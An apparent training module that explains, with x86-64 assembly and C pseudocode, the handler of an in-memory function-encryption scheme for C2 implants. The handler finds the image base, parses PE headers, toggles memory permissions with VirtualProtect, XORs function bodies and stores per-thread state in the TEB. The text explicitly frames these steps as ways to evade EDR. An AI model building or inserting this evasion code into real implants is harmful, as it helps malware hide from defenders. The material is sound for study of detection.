Difficulty: Advanced

Module 6: The Handler & XOR Engine

The ~380-byte core routine that performs memory permission changes, PE header parsing, and byte-level XOR encryption/decryption.

Module Objective

Deep dive into the handler — the shared routine called by every prologue and epilogue stub. Understand its PE header validation logic, .funcmeta section traversal, VirtualProtect permission transitions (RX → RW → RX), byte-level XOR implementation, and the TEB UserReserved field usage for per-thread state management via the GS segment register.

1. Handler Overview

The handler is a single shared routine (~380 bytes) called by every prologue and epilogue stub. It receives two arguments:

Parameter | Register | Description
Function Pointer | RCX | Pointer to the function body that needs to be encrypted or decrypted
Operation Flag | RDX | 0 = decrypt (called from prologue), 1 = encrypt (called from epilogue)

The handler’s job is to:

Handler Steps

  1. Find the PE image base by walking backward from the handler’s own address to find the MZ header
  2. Parse PE headers to locate the .funcmeta section
  3. Search .funcmeta entries to find the metadata for the target function (matching by RVA)
  4. Check the IsEncrypted flag to determine if the requested operation is valid
  5. Call VirtualProtect to change the function’s memory to RW (writable)
  6. XOR the function body bytes with the stored key
  7. Call VirtualProtect to restore RX (executable) permissions
  8. Update the IsEncrypted flag in .funcmeta
  9. Update TEB UserReserved fields to track the currently active function
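
Steps 4, 6, and 8 together make the handler idempotent: a request that matches the current state is a no-op. The following is a minimal, portable sketch of that logic on an ordinary byte buffer. The `func_state` type and `apply_operation` name are hypothetical, and the permission changes of steps 5 and 7 are deliberately left out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical in-memory view of one protected function (illustrative names). */
typedef struct {
    uint8_t *body;         /* function bytes; a plain buffer in this sketch */
    size_t   size;         /* number of bytes to XOR */
    uint8_t  key;          /* single-byte XOR key */
    uint8_t  is_encrypted; /* 1 if body currently holds encrypted bytes */
} func_state;

enum { OP_DECRYPT = 0, OP_ENCRYPT = 1 };

/* Returns 1 if the bytes were toggled, 0 if the request was already satisfied. */
int apply_operation(func_state *f, int operation)
{
    assert(f != NULL);
    assert(operation == OP_DECRYPT || operation == OP_ENCRYPT);

    /* Step 4: skip requests that match the current state. */
    if (operation == OP_DECRYPT && !f->is_encrypted) return 0;
    if (operation == OP_ENCRYPT &&  f->is_encrypted) return 0;

    /* Step 6: XOR every byte with the key (same loop both directions). */
    for (size_t i = 0; i < f->size; i++)
        f->body[i] ^= f->key;

    /* Step 8: record the new state. */
    f->is_encrypted = !f->is_encrypted;
    return 1;
}
```

Calling `apply_operation` twice with the same flag changes the buffer only once, which is why a stray duplicate prologue or epilogue call cannot leave a function double-encrypted.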

2. Finding the Image Base

The handler needs to find the PE image base to locate the section headers. Since ASLR randomizes the load address, the handler uses a backward-scanning technique:

x86-64 Assembly
; Find image base by scanning backward from current address
; PE images are mapped at 64KB-aligned addresses (0x10000)
; Clobbers RAX and R10 only, so the stub arguments in RCX/RDX survive
find_image_base:
    ; Start from the handler's own address, taken RIP-relative so the
    ; code stays position-independent
    lea     rax, [rip + find_image_base]
    and     rax, 0xFFFFFFFFFFFF0000  ; Align down to 64KB boundary

.scan_loop:
    ; Check for MZ signature at this address
    cmp     word ptr [rax], 0x5A4D   ; "MZ" in little-endian
    jne     .next_candidate

    ; Validate: check PE signature
    mov     r10d, dword ptr [rax + 0x3C]   ; e_lfanew (offset to PE header)
    cmp     dword ptr [rax + r10], 0x4550  ; "PE\0\0"
    je      .found_pe

.next_candidate:
    ; No MZ here, or MZ without a PE signature: step back before retrying,
    ; otherwise the same address would be tested forever
    sub     rax, 0x10000             ; Move back 64KB
    jmp     .scan_loop

.found_pe:
    ; Valid PE found - RAX = ImageBase

Why Not Use GetModuleHandle?

Calling GetModuleHandle(NULL) would be simpler, but it requires importing the function from kernel32.dll. The handler is designed to be import-free where possible, reducing the API footprint visible to EDR. The backward MZ scan is a well-known technique used in shellcode and reflective loaders — it works because the Windows PE loader maps executables at 64KB-aligned boundaries.
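
The scan logic can be exercised safely on an ordinary buffer instead of live process memory. The sketch below is an illustration under that assumption: `find_image_base`, `rd16`, and `rd32` are hypothetical helper names, offsets into `mem` stand in for addresses, and bounds checks replace the implicit guarantee that the real handler sits inside a mapped image.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define GRANULARITY 0x10000u /* 64KB allocation granularity */

/* Little-endian reads that do not assume alignment. */
uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Scan backward from offset `start` in 64KB steps.
 * Returns the offset of the first candidate with both an MZ and a PE
 * signature, or -1 if none is found before the start of the buffer. */
long find_image_base(const uint8_t *mem, size_t len, size_t start)
{
    assert(mem != NULL);
    if (start >= len) return -1;

    size_t off = start & ~(size_t)(GRANULARITY - 1); /* align down */
    for (;;) {
        if (off + 0x40 <= len && rd16(mem + off) == 0x5A4D) {
            uint32_t e_lfanew = rd32(mem + off + 0x3C);
            /* PE signature must lie inside the buffer. */
            if (e_lfanew <= len - off - 4 &&
                rd32(mem + off + e_lfanew) == 0x00004550)
                return (long)off;
        }
        if (off < GRANULARITY) return -1; /* nothing left to scan */
        off -= GRANULARITY;               /* always step before retrying */
    }
}
```

A buffer with a decoy "MZ" at one boundary and a full MZ/PE pair at the boundary below it shows why the PE check matters: the decoy is skipped and the scan continues downward.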

3. PE Header Traversal

Once the image base is found, the handler parses the PE headers to locate the .funcmeta section:

x86-64 Assembly
; Navigate PE headers to find .funcmeta section
; RAX = ImageBase (from section 2)
; Uses R8-R11 as scratch so the stub arguments in RCX/RDX survive
parse_pe:
    mov     r10d, [rax + 0x3C]        ; e_lfanew
    lea     r11, [rax + r10]          ; R11 = PE signature address
    ; PE signature at [R11+0]  = "PE\0\0"
    ; COFF header at  [R11+4]  (20 bytes)
    ; Optional hdr at [R11+24] (variable size)

    ; Get number of sections
    movzx   r10d, word ptr [r11 + 6]  ; NumberOfSections

    ; Get size of optional header
    movzx   r8d, word ptr [r11 + 20]  ; SizeOfOptionalHeader

    ; First section header starts after optional header
    lea     r9, [r11 + r8 + 24]       ; R9 = first IMAGE_SECTION_HEADER

    ; Iterate section headers (40 bytes each)
.section_loop:
    ; Compare section name with ".funcmeta"
    ; The Name field at [R9+0] holds only 8 bytes, so the image stores
    ; ".funcmet" and two DWORD compares cover the whole field
    cmp     dword ptr [r9], 0x6E75662E    ; ".fun" in little-endian
    jne     .next_section
    cmp     dword ptr [r9 + 4], 0x74656D63 ; "cmet" in little-endian
    je      .found_funcmeta

.next_section:
    add     r9, 40                    ; sizeof(IMAGE_SECTION_HEADER)
    dec     r10d
    jnz     .section_loop
    ret                               ; .funcmeta not found (shouldn't happen)

.found_funcmeta:
    ; R9 = pointer to .funcmeta section header
    mov     r10d, [r9 + 12]           ; VirtualAddress (RVA)
    lea     rsi, [rax + r10]          ; RSI = .funcmeta data in memory
                                      ; (RSI is callee-saved on Win64; assumed saved on entry)
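
The same header walk can be written in portable C against a byte buffer, which makes the fixed offsets (0x3C, +6, +20, +24, 40-byte headers, RVA at +12) easy to check. This is a sketch, not the handler's code: `find_section_rva` and the read helpers are hypothetical names, and the bounds checks are additions that the size-constrained assembly omits.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Little-endian reads that do not assume alignment. */
uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns the VirtualAddress (RVA) of the named section, or 0 if the
 * headers are malformed or the section is absent. Only the first 8
 * characters of `name` are compared, matching the 8-byte Name field. */
uint32_t find_section_rva(const uint8_t *image, size_t len, const char *name)
{
    assert(image != NULL && name != NULL);

    /* Build an 8-byte, zero-padded copy of the name to compare against. */
    char want[8] = {0};
    for (size_t i = 0; i < 8 && name[i] != '\0'; i++)
        want[i] = name[i];

    if (len < 0x40 || rd16(image) != 0x5A4D) return 0;      /* "MZ" */
    uint32_t e_lfanew = rd32(image + 0x3C);
    if (e_lfanew > len || len - e_lfanew < 24) return 0;
    const uint8_t *pe = image + e_lfanew;
    if (rd32(pe) != 0x00004550) return 0;                   /* "PE\0\0" */

    uint16_t nsections = rd16(pe + 6);   /* COFF NumberOfSections */
    uint16_t opt_size  = rd16(pe + 20);  /* COFF SizeOfOptionalHeader */
    size_t sec_off = (size_t)e_lfanew + 24 + opt_size;

    for (uint16_t i = 0; i < nsections; i++, sec_off += 40) {
        if (sec_off + 40 > len) return 0;
        if (memcmp(image + sec_off, want, 8) == 0)
            return rd32(image + sec_off + 12);              /* VirtualAddress */
    }
    return 0;
}
```

Passing ".funcmeta" works even though the stored name is ".funcmet", because both sides are truncated to eight bytes before the comparison.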

4. .funcmeta Entry Lookup

The .funcmeta section is a flat array of entries. The handler searches for the entry matching the target function (whose address was passed in RCX by the stub):

x86-64 Assembly
; Search .funcmeta for the target function
; RSI = .funcmeta data pointer
; RCX = target function body address (from stub)
; RAX = ImageBase
search_funcmeta:
    ; Convert target address to RVA
    sub     rcx, rax                  ; RCX = function RVA

.entry_loop:
    ; Each entry: [4B RVA][4B Size][1B Key][1B IsEncrypted][2B Pad]
    mov     edi, [rsi]                ; Entry's FunctionRVA
    test    edi, edi                  ; NULL terminator?
    jz      .not_found                ; Shouldn't happen for valid calls

    cmp     edi, ecx                  ; Compare with target RVA
    je      .found_entry

    add     rsi, 12                   ; Next entry (12 bytes per entry)
    jmp     .entry_loop

.found_entry:
    ; RSI points to the matching entry
    ; [RSI+0]  = FunctionRVA (DWORD)
    ; [RSI+4]  = FunctionSize (DWORD)
    ; [RSI+8]  = XorKey (BYTE)
    ; [RSI+9]  = IsEncrypted (BYTE)
    ; [RSI+10] = Reserved (WORD)
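
The 12-byte entry layout maps directly onto a C struct, and compile-time assertions can confirm that the field offsets match the `[RSI+n]` comments above. The struct and function names below are hypothetical; only the field order and sizes come from the layout described in this section.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* One .funcmeta entry: [4B RVA][4B Size][1B Key][1B IsEncrypted][2B Pad] */
typedef struct {
    uint32_t function_rva;  /* +0  */
    uint32_t function_size; /* +4  */
    uint8_t  xor_key;       /* +8  */
    uint8_t  is_encrypted;  /* +9  */
    uint16_t reserved;      /* +10 */
} func_meta_entry;

/* The assembly advances by 12 bytes per entry, so the struct must too. */
static_assert(sizeof(func_meta_entry) == 12, "entry must be 12 bytes");
static_assert(offsetof(func_meta_entry, xor_key) == 8, "key at +8");
static_assert(offsetof(func_meta_entry, is_encrypted) == 9, "flag at +9");

/* Linear search over a table terminated by an entry whose RVA is 0.
 * Returns NULL when the terminator is reached without a match. */
func_meta_entry *find_entry(func_meta_entry *table, uint32_t target_rva)
{
    assert(table != NULL);
    for (func_meta_entry *e = table; e->function_rva != 0; e++) {
        if (e->function_rva == target_rva)
            return e;
    }
    return NULL;
}
```

Returning NULL on a miss gives the caller an explicit not-found signal instead of a pointer to the terminator entry.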

5. VirtualProtect Permission Changes

Before XOR-ing the function body, the handler must change memory permissions. The function’s .text section is normally PAGE_EXECUTE_READ (RX), which prevents writing. The handler toggles to PAGE_READWRITE (RW) for the XOR operation, then back to PAGE_EXECUTE_READ after:

C (Pseudocode)
// Permission change sequence in the handler
void handler(void* func_body, int operation) {
    FUNC_META_ENTRY* entry = find_entry(func_body);
    DWORD oldProtect;

    // Step 1: Change to RW (writable, non-executable).
    // VirtualProtect works on whole pages, so every page the range touches changes.
    if (!VirtualProtect(
            func_body,
            entry->FunctionSize,
            PAGE_READWRITE,         // 0x04
            &oldProtect))           // Receives previous protection (PAGE_EXECUTE_READ)
        return;                     // Body is not writable: leave it untouched

    // Step 2: XOR the function body
    xor_memory(func_body, entry->FunctionSize, entry->XorKey);

    // Step 3: Restore to RX (executable, non-writable)
    VirtualProtect(
        func_body,
        entry->FunctionSize,
        PAGE_EXECUTE_READ,      // 0x20
        &oldProtect
    );

    // Step 4: Update state
    entry->IsEncrypted = !entry->IsEncrypted;
}

VirtualProtect is the Main Detection Surface

VirtualProtect is a well-monitored API. EDR products hook it to detect memory permission changes (a classic indicator of shellcode injection and sleep obfuscation). The per-function granularity of FunctionPeekaboo means many small VirtualProtect calls rather than one large one, which could be either harder or easier to detect depending on the EDR’s heuristics. An advanced implementation might use NtProtectVirtualMemory syscalls directly to bypass user-mode hooks.

6. The XOR Engine

The actual encryption/decryption is a simple byte-level XOR loop. Since XOR is its own inverse, the same operation encrypts and decrypts:

x86-64 Assembly
; XOR engine - encrypt or decrypt function body
; RDI = pointer to function body
; ECX = function body size (bytes)
; AL  = XOR key
xor_engine:
    test    ecx, ecx
    jz      .xor_done

.xor_loop:
    xor     byte ptr [rdi], al    ; XOR single byte
    inc     rdi                    ; Next byte
    dec     ecx                    ; Decrement counter
    jnz     .xor_loop

.xor_done:
    ret

This is intentionally simple. The loop processes one byte at a time, which is not the fastest possible implementation but is the smallest and most reliable. Optimization options include:

Optimization | Approach | Trade-off
8-byte blocks | Broadcast XOR key to 8 bytes, XOR a QWORD at a time | About 8x fewer loop iterations, slightly more code, needs a byte loop for the leftover tail
SSE/AVX | Use PXOR/VPXOR with 16-, 32-, or 64-byte vectors | 16-64x fewer loop iterations, much more code, vector register save overhead
REP STOSB variant | Use string operations (LODSB / XOR / STOSB) | Simple, but no REP-prefixed XOR instruction exists, so an explicit loop remains

Why Byte-by-Byte?

Function bodies vary in size and are not guaranteed to be aligned to any particular boundary. A byte-by-byte loop handles all sizes correctly without alignment checks. For typical function sizes (hundreds to low thousands of bytes), the performance difference between byte-by-byte and QWORD XOR is microseconds — negligible compared to the VirtualProtect syscall overhead.
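
For comparison, the 8-byte-block variant can be sketched in C as follows. The function names are hypothetical, and `memcpy` is used for the 64-bit loads and stores so the code makes no alignment assumptions. It produces the same bytes as the byte loop, and applying it twice restores the original buffer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Reference implementation: one byte per iteration. */
void xor_bytes(uint8_t *p, size_t n, uint8_t key)
{
    assert(p != NULL || n == 0);
    for (size_t i = 0; i < n; i++)
        p[i] ^= key;
}

/* Block variant: broadcast the key to all 8 byte lanes, XOR 8 bytes at
 * a time, then finish the 0-7 leftover bytes with the byte loop. */
void xor_qwords(uint8_t *p, size_t n, uint8_t key)
{
    assert(p != NULL || n == 0);
    const uint64_t wide = 0x0101010101010101ULL * key; /* key in every lane */
    size_t i = 0;

    for (; i + 8 <= n; i += 8) {
        uint64_t v;
        memcpy(&v, p + i, 8);   /* unaligned-safe load */
        v ^= wide;
        memcpy(p + i, &v, 8);   /* unaligned-safe store */
    }
    for (; i < n; i++)          /* tail bytes */
        p[i] ^= key;
}
```

Because every lane of `wide` holds the same key byte, the result does not depend on byte order, so the two functions agree on any platform.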

7. TEB UserReserved Fields

The Thread Environment Block (TEB) contains a UserReserved array that is set aside for application use. In the public x86-64 TEB layout it is five ULONGs (20 bytes) starting at offset 0xE8, which is enough room for one 8-byte pointer, one 8-byte flags value, and a spare DWORD. Windows itself is not known to use these bytes, making them a convenient place for per-thread state. Offsets higher in the TEB, such as 0x1478 (DeallocationStack) and 0x1480 (the start of TlsSlots), belong to the system and must not be overwritten:

x86-64 Assembly
; Access TEB via GS segment register (x86-64 Windows)
; GS:[0x30] = pointer to TEB itself (self-reference)
; GS:[0xE8] = UserReserved[0..1] (8 bytes)
; GS:[0xF0] = UserReserved[2..3] (8 bytes)
; GS:[0xF8] = UserReserved[4]    (4 bytes)

; FunctionPeekaboo uses these for per-thread tracking:
; UserReserved[0..1] = pointer to currently active (decrypted) function body
; UserReserved[2..3] = operation flags / recursion counter

; In the handler - update active function tracking:
; RCX = function pointer, RDX = operation flag (0 = decrypt, 1 = encrypt)
update_teb:
    test    rdx, rdx
    jnz     .on_encrypt

    ; On decrypt (prologue): store function pointer
    mov     qword ptr gs:[0xE8], rcx      ; Store active function ptr
    jmp     .teb_done

.on_encrypt:
    ; On encrypt (epilogue): clear active function pointer
    mov     qword ptr gs:[0xE8], 0        ; No function currently active

.teb_done:

Why TEB and Not a Global Variable?

A global variable would work for single-threaded implants, but most C2 implants are multithreaded (handling multiple tasks concurrently). The TEB is per-thread, so each thread can independently track which function it is currently executing. This prevents thread A’s function state from interfering with thread B’s function state.

8. GS Segment Register on Windows x64

On x86-64 Windows, the GS segment base points to the TEB of the current thread. The kernel reloads the GS base on every thread switch, so GS:[offset] always refers to the current thread’s TEB:

GS Offset | TEB Field | Purpose
GS:[0x00] | ExceptionList | SEH chain head (unused by x64 table-based exception handling)
GS:[0x08] | StackBase | Highest stack address
GS:[0x10] | StackLimit | Lowest committed stack address
GS:[0x30] | Self | TEB self-pointer
GS:[0x40] | ClientId.UniqueProcess | PID
GS:[0x48] | ClientId.UniqueThread | TID
GS:[0x60] | ProcessEnvironmentBlock | PEB pointer
GS:[0xE8] | UserReserved[0..1] | FunctionPeekaboo: active function ptr
GS:[0xF0] | UserReserved[2..3] | FunctionPeekaboo: flags
GS:[0xF8] | UserReserved[4] | FunctionPeekaboo: reserved

GS vs FS

On x86-64 Windows, GS points to the TEB. On x86-32, it was FS. This is a common source of confusion. FunctionPeekaboo targets x86-64 and uses GS exclusively. On Linux, the segment register usage is reversed (FS for TLS on x86-64), but FunctionPeekaboo is Windows-specific.
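
TEB offsets are easy to get wrong, so it can help to check them at compile time. The sketch below models the first 0x108 bytes of the x86-64 TEB as a plain C struct with fixed-width fields. `teb_head_model` is a hypothetical name, and the field list follows the publicly available symbol layout, which is an assumption that should be verified against the target Windows build.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Portable model of the start of the x86-64 TEB (pointers as uint64_t). */
typedef struct {
    uint64_t ExceptionList;                /* 0x00  NT_TIB begins */
    uint64_t StackBase;                    /* 0x08 */
    uint64_t StackLimit;                   /* 0x10 */
    uint64_t SubSystemTib;                 /* 0x18 */
    uint64_t FiberData;                    /* 0x20 */
    uint64_t ArbitraryUserPointer;         /* 0x28 */
    uint64_t Self;                         /* 0x30  NT_TIB ends */
    uint64_t EnvironmentPointer;           /* 0x38 */
    uint64_t UniqueProcess;                /* 0x40  ClientId.UniqueProcess */
    uint64_t UniqueThread;                 /* 0x48  ClientId.UniqueThread */
    uint64_t ActiveRpcHandle;              /* 0x50 */
    uint64_t ThreadLocalStoragePointer;    /* 0x58 */
    uint64_t ProcessEnvironmentBlock;      /* 0x60 */
    uint32_t LastErrorValue;               /* 0x68 */
    uint32_t CountOfOwnedCriticalSections; /* 0x6C */
    uint64_t CsrClientThread;              /* 0x70 */
    uint64_t Win32ThreadInfo;              /* 0x78 */
    uint32_t User32Reserved[26];           /* 0x80 */
    uint32_t UserReserved[5];              /* 0xE8 */
    uint32_t Padding;                      /* 0xFC  explicit alignment pad */
    uint64_t WOW32Reserved;                /* 0x100 */
} teb_head_model;

static_assert(offsetof(teb_head_model, Self) == 0x30, "Self");
static_assert(offsetof(teb_head_model, UniqueProcess) == 0x40, "PID");
static_assert(offsetof(teb_head_model, UniqueThread) == 0x48, "TID");
static_assert(offsetof(teb_head_model, ProcessEnvironmentBlock) == 0x60, "PEB");
static_assert(offsetof(teb_head_model, UserReserved) == 0xE8, "UserReserved");
static_assert(offsetof(teb_head_model, WOW32Reserved) == 0x100, "WOW32Reserved");
```

If any field were the wrong width or out of order, compilation would fail at the matching `static_assert`, which is a cheap guard to keep next to any code that hard-codes GS offsets.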

9. Complete Handler Pseudocode

C (Pseudocode)
// Complete handler logic (~380 bytes compiled)
void __fastcall handler(void* func_body_ptr, uint64_t operation) {
    // 1. Find image base (backward MZ scan)
    uintptr_t base = find_image_base();

    // 2. Parse PE headers to find .funcmeta
    IMAGE_DOS_HEADER* dos = (IMAGE_DOS_HEADER*)base;
    IMAGE_NT_HEADERS* nt = (IMAGE_NT_HEADERS*)(base + dos->e_lfanew);
    IMAGE_SECTION_HEADER* sections = IMAGE_FIRST_SECTION(nt);

    FUNC_META_ENTRY* meta = NULL;
    for (int i = 0; i < nt->FileHeader.NumberOfSections; i++) {
        if (memcmp(sections[i].Name, ".funcmeta", 8) == 0) {
            meta = (FUNC_META_ENTRY*)(base + sections[i].VirtualAddress);
            break;
        }
    }

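    // 3. Find matching entry
    if (meta == NULL)
        return;  // .funcmeta section missing
    uint32_t func_rva = (uint32_t)((uintptr_t)func_body_ptr - base);
    while (meta->FunctionRVA != 0 && meta->FunctionRVA != func_rva)
        meta++;
    if (meta->FunctionRVA == 0)
        return;  // Reached the terminator: no entry for this function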

    // 4. Validate operation
    if (operation == 0 && !meta->IsEncrypted)
        return;  // Already decrypted, skip
    if (operation == 1 && meta->IsEncrypted)
        return;  // Already encrypted, skip

    // 5. Change permissions to RW
    DWORD old;
    VirtualProtect(func_body_ptr, meta->FunctionSize, PAGE_READWRITE, &old);

    // 6. XOR the function body
    uint8_t* bytes = (uint8_t*)func_body_ptr;
    for (DWORD i = 0; i < meta->FunctionSize; i++) {
        bytes[i] ^= meta->XorKey;
    }

    // 7. Restore permissions to RX
    VirtualProtect(func_body_ptr, meta->FunctionSize, PAGE_EXECUTE_READ, &old);

    // 8. Update metadata
    meta->IsEncrypted = !meta->IsEncrypted;

    // 9. Update TEB tracking (UserReserved starts at TEB offset 0xE8 on x64)
    if (operation == 0) {  // decrypt
        __writegsqword(0xE8, (uint64_t)func_body_ptr);
    } else {               // encrypt
        __writegsqword(0xE8, 0);
    }
}

10. Handler as Position-Independent Code

The handler itself must be position-independent: it cannot contain absolute addresses, and it avoids relying on the import table where possible. The only external dependency is VirtualProtect from kernel32.dll, which can be resolved in more than one way:

VirtualProtect Resolution Options

The PoC uses the IAT approach for simplicity. A production implementation (like Nighthawk) would likely use direct syscalls.

Knowledge Check

Q1: How does the handler find the PE image base at runtime?

A) It reads the ImageBase field from a global variable
B) It calls GetModuleHandle(NULL)
C) It scans backward from its own address on 64KB boundaries looking for the MZ signature
D) The linker stores it in the .stub section

Q2: Why does FunctionPeekaboo use TEB UserReserved fields instead of global variables?

A) TEB is per-thread, allowing multithreaded implants to track each thread's active function independently
B) Global variables are not supported on Windows
C) TEB fields are encrypted by the OS for security
D) Global variables would be too slow to access

Q3: What is the primary detection surface of the handler?

A) The XOR operation itself
B) VirtualProtect calls to change memory permissions (RX → RW → RX)
C) The TEB field writes
D) The PE header parsing